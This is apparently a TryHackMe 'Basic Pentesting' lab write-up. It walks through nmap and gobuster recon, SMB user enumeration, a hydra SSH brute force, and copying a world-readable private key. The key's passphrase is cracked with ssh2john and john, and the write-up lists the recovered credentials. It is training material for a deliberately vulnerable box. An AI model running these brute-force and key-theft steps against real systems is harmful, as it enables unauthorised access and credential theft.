3 minute read

TryHackMe — Basic Pentesting

Difficulty: Easy Date: June 29, 2026 Author: Ross Fisher


Overview

Basic Pentesting teaches a realistic engagement workflow — read notes left by developers, extract usernames from SMB, brute force SSH, pivot between users using a stolen SSH key, and crack the passphrase to get in. No fancy exploits. Just enumeration, credential attacks, and following the bread crumbs the box leaves you.

Credentials found:

  • jan:armando (SSH brute force)
  • kay key passphrase: beeswax

kay’s pass.bak contents: heresareallystrongpasswordthatfollowsthepasswordpolicy$$


Recon

Nmap

sudo nmap -sV -sC -p- --min-rate 5000 -Pn 10.144.128.155

Key ports:

  • 22 — OpenSSH 8.2p1
  • 80 — Apache 2.4.41
  • 139/445 — Samba SMB
  • 8009 — Apache Jserv AJP13
  • 8080 — Apache Tomcat 9.0.7

The -sC flag runs default NSE scripts which immediately pulled SMB signing info and the NetBIOS name BASIC2. Always use -sC when you see SMB open — it saves a separate enumeration step.

Web — /development

Gobuster found /development on port 80:

gobuster dir -u http://10.144.128.155 -w /usr/share/wordlists/dirb/common.txt -t 50

Inside were two developer notes that handed us everything we needed:

Note 1:

  • Apache Struts 2.5.12 running (known vulnerable version)
  • Written and signed by K

Note 2:

  • SMB configured — signed by K
  • K audited /etc/shadow and cracked J’s hash easily
  • J has a weak password, told to change it

This tells us two things immediately: the usernames are jan and kay, and jan has a weak password in rockyou.


SMB Enumeration — enum4linux

enum4linux -a 10.144.128.155

Confirmed the Unix usernames via RID cycling:

S-1-22-1-1000 Unix User\kay
S-1-22-1-1001 Unix User\jan
S-1-22-1-1002 Unix User\ubuntu

Also found an Anonymous share with read access — worth checking on future engagements even if it was empty here.


Foothold — Brute Forcing jan’s SSH Password

Armed with the username jan and the knowledge that the password is weak:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.144.128.155

Cracked in about 3 minutes:

[22][ssh] host: 10.144.128.155   login: jan   password: armando
ssh jan@10.144.128.155
# password: armando

Privilege Escalation — jan to kay

Enumeration as jan

sudo -l
# Sorry, user jan may not run sudo on ip-10-144-128-155.

find / -perm -u=s -type f 2>/dev/null
# Nothing useful — all standard system binaries

Checked kay’s home directory:

ls -la /home/kay/

Found:

  • pass.bak — no read permission as jan
  • .ssh/ directory — readable
ls -la /home/kay/.ssh/
# id_rsa is readable by everyone (permissions: -rw-r--r--)
cat /home/kay/.ssh/id_rsa

Kay’s SSH private key was world-readable. Copied it back to Kali.

Cracking the Key Passphrase

The key header showed Proc-Type: 4,ENCRYPTED — passphrase protected. Used ssh2john to convert it to a crackable format:

ssh2john ~/THM/kay_key > ~/THM/kay_hash.txt
john ~/THM/kay_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Cracked instantly:

beeswax    (/home/ross/THM/kay_key)

SSH as kay

chmod 600 ~/THM/kay_key
ssh -i ~/THM/kay_key kay@10.144.128.155
# passphrase: beeswax
cat pass.bak
# heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Attack Chain Summary

Nmap → SMB + HTTP on 80
→ gobuster → /development → dev notes → usernames jan + kay
→ enum4linux → confirmed jan + kay as Unix users
→ hydra SSH brute force → jan:armando
→ SSH as jan
→ /home/kay/.ssh/id_rsa (world-readable)
→ ssh2john + john → passphrase: beeswax
→ SSH as kay → pass.bak

Key Lessons

1. Developer notes are goldmines. The /development directory handed us usernames, a hint that one password is weak, and information about the tech stack. Always read everything on the web server.

2. enum4linux for any box with 139/445 open. It confirmed the exact Unix usernames via null session RID cycling. Minimum password length of 5 from the password policy also told us the password wouldn’t be complex.

3. Check SSH key permissions. Kay’s id_rsa was world-readable (-rw-r--r--). That’s a misconfiguration that gives any local user a path to escalate. Always check /home/*/. ssh/ when you’re on a box as a low-priv user.

4. ssh2john is the tool for passphrase-protected keys. Same workflow as any other john crack — convert to hash format, run against rockyou.

5. File path matters. Spent time debugging because ~/kay_key resolves to /home/ross/kay_key but the file was in ~/THM/kay_key. Always check ls before assuming a file exists where you think it does.


Tools Used

  • nmap (-sV -sC)
  • gobuster
  • enum4linux
  • hydra
  • ssh
  • ssh2john
  • john

Categories:

Updated: